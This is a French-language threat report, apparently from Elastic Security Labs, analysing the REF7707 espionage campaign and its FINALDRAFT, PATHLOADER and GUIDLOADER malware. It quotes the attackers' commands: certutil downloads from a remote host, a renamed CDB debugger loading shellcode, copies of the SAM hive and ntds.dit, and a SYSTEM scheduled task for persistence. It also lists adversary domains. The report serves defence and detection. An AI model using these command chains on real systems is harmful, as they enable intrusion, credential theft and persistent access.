De l'Amérique du Sud à l'Asie du Sud-Est : Le réseau fragile de REF7707

REF7707 résumé

Elastic Security Labs a surveillé une campagne visant le ministère des affaires étrangères d'un pays d'Amérique du Sud qui a des liens avec d'autres compromissions en Asie du Sud-Est. Nous suivons cette campagne en tant que REF7707.

Alors que la campagne REF7707 se caractérise par un ensemble d'intrusions nouvelles, bien conçues et très performantes, les responsables de la campagne ont fait preuve d'une mauvaise gestion et de pratiques d'évasion incohérentes.

L'ensemble d'intrusions utilisé par REF7707 comprend de nouvelles familles de logiciels malveillants que nous appelons FINALDRAFT, GUIDLOADER et PATHLOADER. Nous avons fourni une analyse détaillée de leurs fonctions et capacités dans le rapport d'analyse des logiciels malveillants REF7707 - You've Got Malware : FINALDRAFT se cache dans vos brouillons.

Principaux points abordés dans cet article

• REF7707 a exploité de nouveaux logiciels malveillants contre des cibles multiples.
• Le logiciel malveillant FINALDRAFT possède une variante Windows et une variante Linux.
• REF7707 a utilisé un LOLBin peu commun pour obtenir l'exécution du point final.
• Forte utilisation de services en nuage et de services tiers pour le C2
• Les attaquants ont utilisé une sécurité opérationnelle faible qui a exposé des logiciels malveillants et des infrastructures supplémentaires qui n'ont pas été utilisés dans le cadre de cette campagne.

Aperçu de la campagne

Fin novembre 2024, Elastic Security Labs a observé un groupe restreint d'alertes comportementales au niveau des points finaux au sein du ministère des Affaires étrangères d'un pays d'Amérique du Sud. L'enquête s'est poursuivie et nous avons découvert une campagne tentaculaire et un ensemble d'intrusions comprenant de nouveaux logiciels malveillants, un ciblage sophistiqué et une cadence d'exploitation mature.

Si certaines parties de la campagne ont montré un haut niveau de planification et de compétence technique, de nombreux oublis tactiques ont exposé des échantillons de préproduction de logiciels malveillants, des infrastructures et des victimes supplémentaires.

La présentation de la campagne (le modèle du diamant)

Elastic Security Labs utilise le modèle du diamant pour décrire les relations de haut niveau entre les adversaires, les capacités, l'infrastructure et les victimes d'intrusions. Bien que le modèle en diamant soit le plus souvent utilisé avec des intrusions uniques et en tirant parti du filtrage des activités (section 8) pour créer des relations entre les incidents, un modèle centré sur l'adversaire (section 7.1.4) peut également être utilisé pour créer des relations entre les incidents. permet d'obtenir un diamant unique, bien qu'encombré.

Flux d'exécution

Chaîne d'exécution primaire

REF7707 a été initialement identifié grâce à la télémétrie d'Elastic Security du ministère des Affaires étrangères d'un pays d'Amérique du Sud. Nous avons observé une tactique courante de LOLBin consistant à utiliser l' application certutil de Microsoft pour télécharger des fichiers à partir d'un serveur distant et les enregistrer localement.

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar

certutil  -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini

certutil  -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log

Le serveur web hébergeant fontdrvhost.exe, fontdrvhost.rar, config.ini et wmsetup.log se trouve dans la même organisation, mais il n'exécute pas l'agent élastique. Il s'agit du premier mouvement latéral observé, qui a permis d'obtenir des informations sur l'intrusion. Nous examinerons ces fichiers plus en détail, mais pour l'instant, fontdrvhost.exe est un outil de débogage, config.ini est un fichier INI militarisé, et fontdrvhost.rar n'était pas récupérable.

WinrsHost.exe

Le plugin Remote Shell de Windows Remote Management (WinrsHost.exe) a été utilisé pour télécharger les fichiers sur ce système à partir d'un système de source inconnue sur un réseau connecté. Le plugin est le processus côté client utilisé par la gestion à distance de Windows. Cela indique que les attaquants possédaient déjà des informations d'identification réseau valides et qu'ils les utilisaient pour effectuer un mouvement latéral à partir d'un hôte précédemment compromis dans l'environnement. On ne sait pas comment ces informations d'identification ont été obtenues ; il est possible qu'elles proviennent du serveur web hébergeant les fichiers suspects.

L'attaquant a téléchargé fontdrvhost.exe, fontdrvhost.rar, config.ini et wmsetup.log dans le répertoire C:\ProgramData\ ; de là, il s'est déplacé vers plusieurs autres points d'extrémité Windows. Bien que nous ne puissions pas identifier toutes les informations d'identification exposées, nous avons noté l'utilisation d'un compte d'administrateur local pour télécharger ces fichiers.

En suivant les téléchargements du serveur web vers le point d'accès, nous avons vu un groupe de règles comportementales se déclencher en succession rapide.

Sur six systèmes Windows, nous avons observé l'exécution d'un binaire non identifié (08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1) en tant qu'enfant de Services.exe. Ce binaire suspect utilise un nom de fichier attribué de manière pseudo-aléatoire, composé de six lettres majuscules, avec une extension .exe, et se trouve dans le chemin C:\Windows\ (exemple : C:\Windows\cCZtzzwy.exe). Nous n'avons pas pu collecter ce fichier pour l'analyser, mais nous en déduisons qu'il s'agit d'une variante de PATHLOADER sur la base de la taille du fichier (170,495 octets) et de son emplacement. Ce fichier a été transmis entre les systèmes à l'aide de SMB.

FontDrvHost.exe

Une fois que l'attaquant a collecté fontdrvhost.exe, fontdrvhost.rar, config.ini et wmsetup.log, il exécute fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9) pour poursuivre l'intrusion. fontdrvhost.exe est une version renommée du débogueur signé par Windows CDB.exe. L'utilisation abusive de ce binaire a permis à nos attaquants d'exécuter un shellcode malveillant fourni dans le fichier config.ini sous l'apparence de binaires de confiance.

CDB est un débogueur qui a plus de 15 ans. En recherchant la fréquence à laquelle il a été soumis avec des fichiers suspects à VirusTotal, nous constatons une activité accrue en 2021 et une accélération agressive à partir de la fin 2024.

Le CDB est un fichier LOLBas documenté, mais il n'y a pas eu beaucoup de recherches publiées sur la façon dont il peut être utilisé de manière abusive. Le chercheur en sécurité mrd0x a rédigé une excellente analyse de la CDB décrivant comment elle peut être utilisée pour exécuter du shellcode, lancer des exécutables, exécuter des DLL, exécuter des commandes shell et mettre fin à des solutions de sécurité (et même une analyse plus ancienne de 2016 l'utilisant comme exécuteur de shellcode). Bien qu'elle ne soit pas nouvelle, cette méthode d'attaque n'est pas courante et pourrait être utilisée avec d'autres métadonnées d'intrusion pour relier les acteurs d'une campagne à l'autre.

Bien que config.ini n'ait pas été collecté à des fins d'analyse, il contenait un mécanisme par lequel fontdrvhost.exe chargeait un shellcode ; la manière dont il était invoqué est similaire à FINALDRAFT.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

• -cf - spécifie le chemin et le nom d'un fichier de script. Ce fichier script est exécuté dès que le débogueur est démarré.
• config.ini - voici le script à charger
• -o - débogue tous les processus lancés par l'application cible

Ensuite, fontdrvhost.exe a engendré mspaint.exe et y a injecté un shellcode.

Les ingénieurs inverses d'Elastic Security Labs ont analysé ce shellcode pour identifier et caractériser le logiciel malveillant FINALDRAFT. Enfin, fontdrvhost.exe a injecté dans la mémoire un shellcode supplémentaire (6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3) qui a également été identifié comme étant le logiciel malveillant FINALDRAFT.

Comme décrit dans l'analyse de FINALDRAFT, le logiciel malveillant utilise par défaut mspaint.exe ou conhost.exe si aucun paramètre cible n'est fourni pour une commande liée à l'injection.

Contrôles de connectivité

L'adversaire a effectué plusieurs tests de connectivité à l'aide de la commande ping.exe et via PowerShell.

La cmdlet Invoke-WebRequest de Powershell est similaire à wget ou curl, qui permet d'extraire le contenu d'une ressource web. Cette cmdlet peut être utilisée pour télécharger des outils à partir de la ligne de commande, mais ce n'était pas le cas ici. Ces demandes dans le contexte de plusieurs pingsont plus susceptibles d'être des contrôles de connectivité.

graph.microsoft[.]com et login.microsoftonline[.]com sont des sites Microsoft appartenant légitimement à Microsoft qui servent d'API et d'interface graphique web pour le service de messagerie en nuage Outlook de Microsoft et d'autres produits Office 365 .

• ping graph.microsoft[.]com
• ping www.google[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://google[.]com\
• Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsing
• Powershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing

digert.ictnsc[.]com et support.vmphere[.]com étaient des infrastructures appartenant à l'adversaire.

• ping digert.ictnsc[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing

Vous trouverez plus d'informations sur ces domaines de réseau dans la section sur l'infrastructure ci-dessous.

Reconnaissance / énumération / collecte de données d'identification

L'adversaire a exécuté un script inconnu appelé SoftwareDistribution.txt à l'aide de l'utilitaire diskshadow.exe, a extrait les ruches SAM, SECURITY et SYSTEM Registry, et a copié la base de données Active Directory (ntds.dit). Ces documents contiennent principalement des titres et des métadonnées de titres. L'adversaire a utilisé l'utilitaire 7zip pour compresser les résultats :

diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt

cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y

cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y

7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"

L'adversaire a également énuméré des informations sur le système et le domaine :

systeminfo

dnscmd . /EnumZones

net group /domain

C:\\Windows\\system32\\net1 group /domain

quser

reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID

reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

Persistance

La persistance a été obtenue en utilisant une tâche planifiée qui a invoqué le débogueur renommé CDB.exe et le fichier INI militarisé toutes les minutes en tant que SYSTEM. Cette méthode a permis de s'assurer que FINALDRAFT restait en mémoire.

schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\" 
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" 
/sc MINUTE /mo 1 /RU SYSTEM

• schtasks - le programme Tâches planifiées
• /create - crée une nouvelle tâche programmée
• /RL HIGHEST - spécifie le niveau d'exécution du travail, HIGHEST correspond au niveau de privilèges le plus élevé
• /F - supprimer les avertissements
• /tn \\Microsoft\\Windows\\AppID\\EPolicyManager\ - nom de la tâche, en essayant de refléter une tâche programmée d'apparence authentique
• /tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" - la tâche à exécuter, dans ce cas les commandes fontdrvhost.exe que nous avons couvertes plus tôt
• /sc MINUTE - type d'horaire, MINUTE spécifie l'exécution à intervalles d'une minute
• /mo 1 - modificateur, définit 1 pour l'intervalle de planification
• /RU SYSTEM - définit le compte sous lequel la tâche doit être exécutée ; dans cette situation, la tâche sera exécutée sous l'utilisateur SYSTEM

PROJET FINAL Analyse

Une étude technique approfondie décrivant les capacités et l'architecture des logiciels malveillants FINALDRAFT et PATHLOADER est disponible ici. À un niveau élevé, FINALDRAFT est un outil d'administration à distance complet et bien conçu, capable d'accepter des modules complémentaires qui étendent les fonctionnalités et permettent d'acheminer le trafic réseau vers l'intérieur par de multiples moyens.

Bien que FINALDRAFT puisse établir une commande et un contrôle par divers moyens, les plus notables sont ceux que nous avons observés dans notre environnement victime, à savoir l' utilisation abusive de l'API Graph de Microsoft. Nous avons observé pour la première fois ce type de C2 de tiers dans SIESTAGRAPH, que nous avons signalé en décembre 2022.

Ce type de commandement et de contrôle représente un défi pour les défenseurs des organisations qui dépendent fortement de la visibilité du réseau. Une fois l'exécution initiale et l'enregistrement terminés, toutes les communications ultérieures passent par l'infrastructure Microsoft légitime (graph.microsoft[.]com) et se fondent dans les autres postes de travail de l'organisation. Il prend également en charge la fonctionnalité de relais qui lui permet d'acheminer le trafic vers d'autres systèmes infectés. Il échappe aux défenses reposant sur la détection d'intrusion en réseau et sur les indicateurs de renseignements sur les menaces.

PATHLOADER et GUIDLOADER

PATHLOADER et GUIDLOADER sont tous deux utilisés pour télécharger et exécuter des shellcodes chiffrés en mémoire. Ils ont été découverts dans VirusTotal lors d'une enquête sur l'infrastructure C2 et les chaînes de caractères identifiées dans une capture de mémoire FINALDRAFT. Ils n'ont été observés qu'en association avec des charges utiles FINALDRAFT.

Un échantillon de mai 2023 dans VirusTotal est le premier binaire identifié de l'ensemble d'intrusion REF7707. Cet échantillon a été soumis pour la première fois par un internaute thaïlandais, dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf) est une variante de PATHLOADER qui charge un binaire FINALDRAFT crypté à partir de poster.checkponit[.]com et support.fortineat[.]com.

Entre juin et août 2023, un utilisateur web de VirusTotal à Hong Kong a téléchargé 12 échantillons de GUIDLOADER. Ces échantillons présentaient chacun des modifications mineures dans la manière dont la charge utile cryptée était téléchargée et étaient configurés pour utiliser des domaines FINALDRAFT :

• poster.checkponit[.]com
• support.fortineat[.]com
• Google Firebase (firebasestorage.googleapis[.]com)
• Pastebin (pastebin[.]com)
• Un système de stockage web pour le public de l'Université d'Asie du Sud-Est

Certains échantillons de GUIDLOADER semblent inachevés ou cassés, avec des routines de décryptage non fonctionnelles, tandis que d'autres contiennent des chaînes de débogage intégrées dans le binaire. Ces variations suggèrent que les échantillons ont fait partie d'un processus de développement et de test.

FINALDRAFT bridging OS’

Fin 2024, deux variantes de Linux ELF FINALDRAFT ont été téléchargées sur VirusTotal, l'une en provenance des États-Unis et l'autre du Brésil. Ces échantillons présentent une polyvalence C2 similaire et une réimplémentation partielle des commandes disponibles dans la version Windows. Des URL ont été extraites de ces fichiers pour support.vmphere[.]com, update.hobiter[.]com et pastebin.com.

Analyse de l'infrastructure

Dans le rapport d'analyse des logiciels malveillants FINALDRAFT, plusieurs domaines ont été identifiés dans les échantillons recueillis lors de l'intrusion REF7707, et d'autres échantillons ont été identifiés grâce à la similarité des codes.

Hachures des bannières de service

Une recherche Censys pour hobiter[.]com (le domaine observé dans la variante ELF de FINALDRAFT, discutée dans la section précédente) renvoie une adresse IP de 47.83.8.198. Ce serveur est basé à Hong Kong et dessert les ports 80 et 443. La chaîne "hobiter[.]com" est associée au certificat TLS sur le port 443. Un pivot de requête Censys sur le hash de la bannière de service de ce port donne six serveurs supplémentaires qui partagent ce hash (sept au total).

Deux serveurs (203.232.112[.]186 et 13.125.236[.]162) ne partagent pas le même profil que les cinq autres. Bien que le hachage de la bannière de service corresponde toujours, ce n'est pas sur le port 443, mais sur les ports 15701, 15702, 15703 et 15709. En outre, les ports en question ne semblent pas prendre en charge les communications TLS. Nous ne les avons pas attribués à REF7707 avec un degré de confiance élevé, mais nous les incluons par souci d'exhaustivité.

Les cinq autres serveurs, y compris le serveur "hobiter" original, présentent plusieurs similitudes :

• Correspondance du hachage de la bannière de service sur le port 443
• Géolocalisation de l'Asie du Sud-Est
• Windows OS
• Certificats TLS émis par Cloudflare
• La plupart d'entre eux ont le même ASN appartenant à Alibaba.

Hobiter et VMphere

update.hobiter[.]com et support.vmphere[.]com ont été trouvés dans un binaire ELF(biosets.rar) à partir de décembre 13, 2024. Les deux domaines ont été enregistrés plus d'un an auparavant, les 12 et 2023 septembre. Ce binaire ELF présente une polyvalence C2 similaire et une réimplémentation partielle des commandes disponibles dans la version Windows de FINALDRAFT.

Une recherche de serveur de noms sur hobiter[.]com et vmphere[.]com ne donne qu'un enregistrement de serveur de noms Cloudflare pour chacun d'eux et aucun enregistrement A. La recherche de leurs sous-domaines connus nous fournit des enregistrements A pointant vers des adresses IP appartenant à Cloudflare.

ICTNSC

ictnsc[.]com est directement associé à l'intrusion REF7707 ci-dessus à partir d'un contrôle de connectivité (ping digert.ictnsc[.]com) effectué par les attaquants. Le serveur associé à ce domaine (8.213.217[.]182) a été identifié par le hachage de la bannière du service Censys sur le service HTTPS décrit ci-dessus. Comme l'autre infrastructure identifiée, le sous-domaine se résout en adresses IP appartenant à Cloudflare, et le domaine parent n'a qu'un enregistrement NS de Cloudflare. ictnsc[.]com a été enregistré le 8, 2023 février.

Bien que nous ne puissions pas confirmer que l'association est malveillante, il convient de noter que le domaine ict.nsc[.]ru est la propriété web du Centre fédéral de recherche en technologies de l'information et de l'informatique, souvent appelé le FRC ou l'ICT. Cette organisation russe mène des recherches dans divers domaines tels que la modélisation informatique, le génie logiciel, le traitement des données, l'intelligence artificielle et le calcul à haute performance.

Bien qu'il n'ait pas été observé dans l'intrusion REF7707, le domaine que nous avons observé (ictnsc[.]com) a un sous-domaine ict (ict.ictnsc[.]com), qui est remarquablement similaire à ict.nsc[.]ru. Encore une fois, nous ne pouvons pas confirmer s'ils sont liés à la FRC ou à l'ITC légitimes, mais il semble que l'auteur de la menace ait voulu que les domaines soient similaires, confondus ou associés l'un à l'autre.

Autodiscovar

Autodiscovar[.]com n'a pas été directement associé à un logiciel malveillant FINALDRAFT. Il a été indirectement associé à l'infrastructure REF7707 par le biais de pivots sur les identifiants d'infrastructure web. Le domaine parent n'a qu'un enregistrement NS Cloudflare. Un sous-domaine identifié par VirusTotal (cloud.autodiscovar[.]com) pointe vers des adresses IP appartenant à Cloudflare. Ce nom de domaine ressemble à d'autres infrastructures web FINALDRAFT et REF7707 et partage le hachage de la bannière du service HTTPS. Ce domaine a été enregistré le 26, 2022 août.

D-links et VM-clouds

d-links[.]net et vm-clouds[.]net ont été enregistrés le 12, 2023 septembre, le même jour que hobiter[.]com et vmphere[.]com. Les serveurs qui hébergent ces sites partagent également le même hachage de la bannière du service HTTPS. Ils ne sont pas directement associés au programme malveillant FINALDRAFT et n'ont pas de sous-domaines routables, bien que pol.vm-clouds[.]net ait été enregistré précédemment.

Fortineat

support.fortineat[.]com a été codé en dur dans l'échantillon PATHLOADER (dwn.exe). Lors de notre analyse du domaine, nous avons découvert qu'il n'était pas encore enregistré. Pour identifier tout autre échantillon communiquant avec le domaine, notre équipe a enregistré ce domaine et configuré un serveur web pour écouter les connexions entrantes.

Nous avons enregistré des tentatives de connexion sur le port 443, où nous avons identifié un modèle spécifique d'octets entrants. Les connexions provenaient de huit entreprises différentes de télécommunications et d'infrastructure Internet en Asie du Sud-Est, ce qui indique des victimes possibles de l'ensemble d'intrusions REF7707.

Checkponit

poster.checkponit[.]com a été observé dans quatre échantillons GUIDLOADER et un échantillon PATHLOADER entre mai et juillet 2023, et il a été utilisé pour héberger le shellcode chiffré FINALDRAFT. L'enregistrement checkponit[.]com a été créé le 26, 2022 août. Il n'y a actuellement aucun enregistrement A pour checkponit[.]com ou poster.checkponit[.]com.

Infrastructure de tiers

Le graph.microsoft[.]com de Microsoft est utilisé par les variantes FINALDRAFT PE et ELF pour la commande et le contrôle via l'API Graph. Ce service est omniprésent et utilisé pour les processus métiers critiques des entreprises utilisant Office 365. Les défenseurs sont vivement encouragés à NE PAS mettre ce domaine sur liste de blocage, à moins que les ramifications commerciales ne soient comprises.

Le service Firebase de Google (firebasestorage.googleapis[.]com), Pastebin (pastebin[.]com) et une université d'Asie du Sud-Est sont des services tiers utilisés pour héberger la charge utile chiffrée permettant aux chargeurs (PATHLOADER et GUIDLOADER) de télécharger et de déchiffrer la dernière étape de FINALDRAFT.

Calendrier REF7707

Conclusion

REF7707 a été découvert lors d'une enquête sur une intrusion dans le ministère des affaires étrangères d'un pays d'Amérique du Sud.

L'enquête a révélé l'existence de nouveaux logiciels malveillants tels que FINALDRAFT et ses différents chargeurs. Ces outils ont été déployés et pris en charge à l'aide de fonctions intégrées au système d'exploitation qui sont difficiles à détecter par les outils anti-malware traditionnels.

FINALDRAFT coopte le service graph API de Microsoft pour la commande et le contrôle afin de minimiser les indicateurs malveillants qui seraient observables par les systèmes traditionnels de détection et de prévention des intrusions basés sur le réseau. Les plates-formes d'hébergement de charges utiles cryptées par des tiers constituent également un défi pour ces systèmes au début de la chaîne d'infection.

Une vue d'ensemble des auteurs et des pivots de VirusTotal à l'aide des indicateurs de ce rapport montre une présence géographique relativement importante en Asie du Sud-Est et en Amérique du Sud. SIESTAGRAPH, de même, était le premier abus d'API graphique que nous ayons observé, et il (REF2924) concernait une attaque contre le ministère des affaires étrangères d'un pays d'Asie du Sud-Est.

Chez Elastic Security Labs, nous défendons les capacités défensives dans les domaines de l'infosec, exploitées par des professionnels compétents, afin d'atténuer au mieux les menaces avancées.

REF7707 par MITRE ATT&CK

Elastic utilise le cadre MITRE ATT& CK pour documenter les tactiques, techniques et procédures communes que les menaces persistantes avancées utilisent contre les réseaux d'entreprise.

• Reconnaissance
• Exécution
• Persistance
• Escalade des privilèges
• Évasion par la défense
• Accès aux identifiants
• Découverte
• Mouvement latéral
• Collecte
• Commande et contrôle
• Exfiltration

Détection de REF7707

YARA

• FINALDRAFT (Windows)
• FINALDRAFT (Linux)
• FINALDRAFT (Multi-OS)
• PATHLOADER
• GUIDLOADER

Observations

Les observables suivants ont été examinés dans le cadre de cette recherche.

Références

Les éléments suivants ont été référencés tout au long de la recherche ci-dessus :

• https://www.elastic.co/security-labs/finaldraft
• https://mrd0x.com/the-power-of-cdb-debugging-tool/
• https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

À propos d'Elastic Security Labs

Elastic Security Labs se consacre à la création d'un changement positif dans le paysage des menaces en fournissant des recherches accessibles au public sur les menaces émergentes.

Suivez Elastic Security Labs sur X @elasticseclabs et consultez nos recherches sur www.elastic.co/security-labs/. Vous pouvez voir la technologie que nous avons utilisée pour cette recherche et d'autres encore en consultant le site Elastic Security.